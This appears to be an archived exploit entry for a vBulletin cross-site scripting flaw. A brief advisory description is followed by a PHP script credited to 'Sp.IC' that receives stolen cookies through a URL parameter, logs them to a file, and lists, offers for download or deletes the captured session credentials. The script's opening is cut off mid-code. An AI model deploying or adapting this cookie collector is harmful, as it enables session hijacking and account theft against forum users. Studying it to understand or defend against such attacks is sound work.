source: https://www.securityfocus.com/bid/6226/info
vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks.
As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running vBulletin.
This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software.
";
}
Else {
$Header = "";
$Footer = "";
}
Print ($Header);
*/
Print ("vBulletin XSS Injection Vulnerability:
Exploit");
Print ("");
Print ("");
Print ("vBulletin XSS Injection Vulnerability: Exploit\n");
Print ("Coded By: Sp.IC
");
/*
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
Case "Log":
$Data = $HTTP_GET_VARS['Cookie'];
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
(DecHex (MD5 (NULL))))));
$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);
Print ("");
Break;
Case "List":
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
Print ("
There are No
Records");
Exit ();
}
Else {
Print ("");
$Records = Array_UniQue (File ($LogFile));
Print ("");
Print (".:: Statics\n");
Print ("\n");
Print ("o Logged Records : " . Count
(File ($LogFile)) . "\n");
Print ("o Listed Records : " . Count
($Records) . " [Not Counting Duplicates]\n");
Print ("\n");
Print (".:: Options\n");
Print ("\n");
If (Count (File ($LogFile)) > 0) {
$Link['Download'] = "[Download]";
}
Else{
$Link['Download'] = "[No Records in Log]";
}
Print ("o Download Log : " . $Link
['Download'] . "\n");
Print ("o Clear Records : [Y]\n");
Print ("\n");
Print (".:: Records\n");
Print ("\n");
While (List ($Line[0], $Line[1]) = Each ($Records)) {
Print ("" . $Line[0] . ": " . $Line[1]);
}
}
Print ("");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("
Deleted Succsesfuly")
Or Die ("
Error: Cannot Delete Log");
Print ("");
Break;
}
?>